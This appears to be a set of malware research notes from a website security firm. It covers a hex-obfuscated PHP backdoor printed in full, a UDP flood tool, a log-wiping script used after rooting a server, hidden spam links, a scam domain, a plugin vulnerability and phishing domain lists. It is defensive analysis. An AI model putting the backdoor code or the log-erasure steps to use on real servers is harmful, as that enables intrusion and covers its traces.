Simple WAF Evasion Backdoor

Our team recently located a malicious PHP file on a compromised website which claims to evade web application firewalls, with the intention of downloading a malicious script to a compromised web-server.

$a = "\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
$b = "\x66\x69\x6c\x65\x5f\x70\x75\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
$b($_REQUEST['c'], $a($_REQUEST['d']));

The $a variable contains hexadecimal encoded text for the built-in PHP function file_get_contents which grabs the malicious payload from a third party website.

The $b variable is hexadecimal encoded text for the PHP function file_put_contents, which writes the contents to a file within the compromised environment.

The function var_dump essentially outputs the following _REQUEST variables, which are defined by URL parameters:

a= PHP function
b= function arguments
c= directory path you want to create with the malicious payload
d= location of the malicious payload

An example of these URL parameters in action would be the following URI, where waf.php contains the malicious code.


example url parameters on a simple waf evasion backdoor

If the website isn’t protected behind a firewall, then the PHP function system is executed along with its argument (in this case ls -lhart) and the malicious payload is downloaded from the defined source to the defined location — all of which is set in the GET request.

This malware tries to be evasive by using the hexadecimal format for its PHP functions of file_get_contents and file_put_contents. More importantly, it allows the attacker to provide the PHP function system through a HTTP GET URL parameter so that it isn’t stored in the file itself. This can help to prevent certain server side malware scanners from detecting it as malicious, since it does nothing without the crafted GET request.

While advertised as a method of bypassing WAFs - it is easily flagged as a RFI/LFI attempt by the Sucuri Firewall.

firewall blocking malicious behavior for backdoor

DoS Tool: 403.php

One of our analysts, Kaushal Bhavsar, found a malicious DoS file within a compromised website’s filesystem under the filename 403.php.

malicious DoS under the filename 403.php

The file attempts to conceal itself from casual viewers by loading a blank white page whenever a visitor loads the file directly in their browser.

To execute malicious code in the file, the visitor needs to pass two URL parameter values, time and host, through a submitted GET request. These two variables store modifiable values for the DoS attack, which the attacker can execute when they submit their request.

The time and host values let the PHP script know how long to run the attack (time) and against whom (host). Once the attacker knows the values they want to use, they can simply submit a GET request with the special parameter values.

Here is an example of a successful attack request shown in the browser, but this request could be sent from any HTTP client.

malicious DoS using GET request with special parameter values

A single website with this malicious file is not much of a threat to most servers and can be quickly blocked, but unprotected servers or clients could face issues if under attack from many different infected websites or host devices (e.g botnet).

The tool performs the attack by flooding UDP packets to the host through a port randomly chosen between 1-65000.

malicious DoS tool performs attack by flooding UDP packets to the host

Clean Logs After Rooting Bash Script

During an active research investigation, we found an interesting bash script described by the author as Clean Logs After Rooting.

This script is used once an attacker has gained unauthorized root access to the server to scrub logs and prevent a website administrator from detecting such unauthorized access.

First, the script stops the server’s logging service located at /etc/init.d/rsyslog.

clean logs after root disable /etc/init.d/rsyslog

It then echos matikan system log, the word for disable in Indonesian, to notify the attacker that the service has stopped.

clean logs after root overwrite log data

After a 2 second pause, it cycles through a list of common logs located in the /var/log/ directory to see if they exist or not:


If the logs exist, then the script uses echo > on the log entry files to tell the system to echo empty file content, essentially overwriting all existing log data for those files.

It then accesses logs from the web server and overwrites all existing log data from those locations.

clean logs after root disable common logs

Because logging has been disabled, no additional information will be populated in any of the log locations.

The script also contains some special commands for cPanel environments. The bash terminal command chattr -ia is used to unlock the cPanel files by changing the file attributes. It also wipes data from cPanel logs used for monitoring various server activity.

clean logs after root wipe cPanel

To further prevent detection of unauthorized access, the script then clears the bash history with the history -c command.

This bash script is especially dangerous for VPS and dedicated environments, since root access is not controlled by the web host and they are typically not as hardened as shared hosting servers.

Size for Opera: Hiding Spammy Links

There are many different tricks hackers use to make injected spam links invisible to regular visitors.

Below is an example employed by one link spam campaign, which primarily promotes porn, torrents, and pharma.

We’re finding links like these inside various HTML tags with short, random ids:

<span id="4CN8d"><a href="hxxps://youjizz[.]center">teen girls</a> busty ebony chick.</span>
<section id="Xwy2w"><a href="hxxps://youjizz[.]center" title="hot teens">hxxps://youjizz[.]center</a><br>
<a href="hxxps://www.thefappeninggirls[.]com">fappening 2020</a> alexa gets her cumshot.<br></section>
<span id="hgPdT">
                <a href="hxxp://yourbunny[.]mobi/">hxxp://yourbunny[.]mobi/</a> <br/>
        <a href="hxxp://lime-torrents[.]org">hxxp://lime-torrents[.]org</a> <br/>
        <a href="hxxp://kickasstorrente[.]net" rel="nofollow">kickass</a>

To hide the links, hackers injects scripts with misleading code.

For example, the following snippet tries to set the size of the spam link element to something entirely fictitious: size_for("Opera")

Code that hides the links

It even contains a function that counts the size. However, not only is the code unrelated to the Opera browser, it’s also erroneous because of the use of the undefined “sum” function.

This error is there “by design”. The code that invokes the size_for function is placed in the try...catch...finally block. No matter what happens in these try and catch blocks, it will always fall back to the finally section, which sets the “display” style of the element to “none”.

In another wave of link injections, this same campaign uses a combination of the following two scripts:

Two-piece spam hiding script

The first script defines the function end_(), which uses a misleadingly named function get_style() to hide the spam element. The second script is injected further in the HTML code to invoke the end_() function and conceal the spam.

At the time of writing, PublicWWW shows over a thousand websites with injected links from this campaign:

Desperate scammers

In an ideal scenario, when a scam website is found by a blacklist authority, it’s flagged as malicious and eventually taken down by the domain registrar or the web host once abuse reports have been verified.

Whenever a blacklist takes down a scam domain, it costs the scammers ample time and resources and means that they’ll need to start over. Sometimes, scammers try to social engineer their domains out of blacklistings — and sometimes they succeed!

We recently encountered such a scammer after we reviewed a domain that had requested to be removed from our blacklist.

The respondent claimed that the domain had been falsely flagged and labeled as a scam:

This email request was interesting — they claimed that other AV vendors (Avast, ESET, Kaspersky, and Fortiguard) had reviewed and removed their domain from their respective blacklists. The email body text also included correspondence between the sender and the three AV vendors.

However, when you actually read the text of the emails only one of the AV vendors actually confirmed that they removed the malicious domain from their “anti-phishing databases”. The other AV vendors said it was not blacklisted or did not reply.

A quick review of the domain brought us to this landing page:

After investigating the website, it was clear that the domain was in no way officially related to Yahoo.

Searching the toll-free phone number pulled up a recent report describing a typical tech support scam: the scammer convinces the victim to give them remote access so they can troubleshoot some problems (which may not even exist). They then offer to fix these problems for a very high fee. A separate report for the number supports this claim.

Unfortunately, these types of tech support scam websites can be rather difficult to blacklist by traditional AV companies and/or removed by the web host, or registrar. Technically, the website itself is not stealing login credentials like a phishing page, nor is it spreading malware to visitors.

The danger lies in the fact that it falsely represents itself as an official Yahoo contact, and uses this credibility indicator to convince victims to dial the phone number. Once they have the victim on the phone, it’s an entirely different story - but the website itself doesn’t look to be used for anything other than encouraging a visitor to call the listed phone number.

The blacklisted domain does mention they are not affiliated to Yahoo in their footer disclaimer, but also uses very ambiguous wording to trick consumers. It also seemingly contradicts itself by first starting they are an independent third party support for “Yahoo Mail support services”, but then goes on to say the business entity “GLS” is “[...]not affiliated with any brand or otherwise authorized by Yahoo to provide any service to Yahoo users.”:

It seems that the scammer has been able to remove themselves from any blacklists in the recent past, but we’ve kept their website blacklisted. It’s a scam, and we want to warn potential victims so they can remain safe from bad actors.

Few notes:

The cert for invalid pages (ex: hxxps://www[.]glstechserve[.]net/404) is for another domain:

This seems to be a generic web services page.

Seems like they also have hxxps://www[.]glsitsolutions[.]com as the contact page has the following contact emails:

  • support@globalitsolution[.]com
  • info@globalitsolutionsusa[.]com
  • hxxp://globalitsolutionsusa[.]com

As well as the exact same template.

The email of the page owner can be found on the contact page of glsitsolutions[.]com

According to this forum:

There are other domains associated to the same scammer:

hxxps://www[.]email-technical-support[.]com/ - This one is offline

Similar service: for malware bytes

Unauthenticated settings update in woocommerce-ajax-filters

woocommerce-ajax-filters, which currently has over 10,000 installations (versions <=1.3.6) allows unauthenticated attackers to arbitrarily update all the plugin options and redirect any user to an external malicious URL when the product section is visited. The bug takes advantage of a misunderstanding of the admin_init hook’s execution context.

if( is_admin() ) {
      require_once dirname( __FILE__ ) . '/includes/wizard.php';

function wizard_selectors($wizard) {
 <div class="wizard_custom_js_css" style="display: none;">
    <h3><?php _e('User custom CSS style', 'BeRocket_AJAX_domain') ?></h3>
    <textarea name="berocket_aapf_wizard_settings[user_custom_css]">
        <?php echo br_get_value_from_array($option, array('user_custom_css')) ?>
    <h3><?php _e('JavaScript Before Products Update', 'BeRocket_AJAX_domain') ?></h3>
    <textarea name="berocket_aapf_wizard_settings[user_func][before_update]">
        <?php echo br_get_value_from_array($option, array('user_func', 'before_update')) ?>
    <h3><?php _e('JavaScript On Products Update', 'BeRocket_AJAX_domain') ?></h3>
    <textarea name="berocket_aapf_wizard_settings[user_func][on_update]">
        <?php echo br_get_value_from_array($option, array('user_func', 'on_update')) ?>
    <h3><?php _e('JavaScript After Products Update', 'BeRocket_AJAX_domain') ?></h3>
    <textarea name="berocket_aapf_wizard_settings[user_func][after_update]">
        <?php echo br_get_value_from_array($option, array('user_func', 'after_update')) ?>


What's the problem with the code above?

  • Developer assumed that WordPress’s admin_init hook are only called when an administrator user visited a page inside /wp-admin/
  • The plugin settings allow users to add custom javascript code

A patch was released a few days ago to address this vulnerability.

Because of the nature of the bug, specifically it’s severity, we will not be disclosing additional details. We are seeing malicious requests being used in the wild. While most of them target /wp-admin/admin-post.php, other endpoints in the /wp-admin/ directory can be used to trigger the admin_init hook and exploit the vulnerability.

Malicious IPs attacking this plugin:

If you have an old version of this plugin installed please update to the latest version (1.3.7) asap. You can add a WAF as a second layer of protection and virtually patch the vulnerability.

Skimmers and Phishing

Recently, we shared a post about a network of domains used in a JavaScript credit card stealing malware campaign. These domains are all hosted on the same server with the IP

In addition to the domains used by the skimmers, the server also had two sites whose domains were clearly created for phishing two Canadian banks:

rbcroyalbank[.] - Real address of the Royal Bank of Canada is

www1-bmo[.] - Online banking for the Bank of Montreal is

Given that the goal of malware on e-commerce sites and bank phishing is to obtain payment details and steal money, it’s quite natural to see the same bad actors participating in both types of attacks.

Moreover, as Group IB wrote in April about the previous wave of these JS skimmers, this campaign is known for using fake Magento login pages on domains mimicking the domain names of the online stores they tried to compromise. So phishing and credit card skimmers complement each other very well.

Unlike other domains, where registrant details were hidden by privacy protection services, the rbcroyalbank[.] domain had public WHOIS information.

Creation Date: 2019-06-10
Registrant ID: 1319589-NIRA
Registrant Name: Julio Jaime
Registrant Organization: Media Lend, LLC
Registrant Email:

Most likely, this information is [mostly] fake—but it was enough to find another batch of phishing domains.

Fake Data:
While the data says the address is in Indiana, the zip code and city provided are in New Jersey.

The email “” suggests a connection to a Russian domain name registrar Most likely, it’s a dedicated email address used specifically for registering new domain names.

We used DomainBigData to search if anything else was associated with that medialand.regru account and found a whole bunch of other [mostly] phishing domains registered in 2019.
Here are just some of them:

facebook-bay[.]com  2019-03-29
facebook-s3[.]com   2019-04-04
facebook-s2[.]com   2019-04-04
facebook-s1[.]com   2019-04-04
facebook-listings[.]com 2019-03-30
facebook-listing[.]com  2019-03-30
facebook-itm[.]com  2019-03-30
facebook-state[.]com    2019-03-29
facebook-restore[.]com  2019-03-23
restore-facebook[.]com  2019-03-23
facebook-area[.]com     2019-03-17
facebook-ss[.]com   2019-03-29
recover-facebook[.]com  2019-03-23
facebook-st[.]com   2019-03-29
facebook-secure[.]com   2019-03-23
static-facebook[.]com   2019-03-23
facebook-us[.]com   2019-03-28
facebook-s6[.]com   2019-04-20
facebook-s5[.]com   2019-04-20
facebook-s4[.]com   2019-04-20

myetherevvalliet[.]com  2019-07-21
Bank phishing
carrefourbanque-compte[.]com    2019-06-18
www-1royalbank[.]com    2019-05-29
clickwebsite-rbc[.]com  2019-05-22
tangerine-en[.]com  2019-05-07
meine-db-account-i73983479[.]com    2019-04-08
acc7201-statement-online[.]com  2019-04-01
postecartaonline[.]com  2019-03-26
client-sofinco[.]net    2019-03-01
olb-secure[.]com    2019-02-20
mabanquepro-bnpparibas[.]com    2019-03-17
bmo-onlinebanking[.]com     2019-05-08
secure-banking-updt[.]com   2019-02-22
com-cgi-bin-3t5ufkygkl56-www-desjardins[.]com   2019-04-25

limited-services-paypal[.]com   2019-05-20
restricted-users-paypai[.]com   2019-06-28

Mobile carriers 
my3-bill[.]com  2019-04-18
three-mybilling[.]com   2019-03-28
threebilling[.]com  2019-03-08
myvodafone-billing[.]com    2019-03-12
account-billing[.]com   2019-03-15

apple-appield[.]com     2019-04-23
apple-restore[.]com     2019-03-28

Many of these domains have already been detected as phishing by various security companies: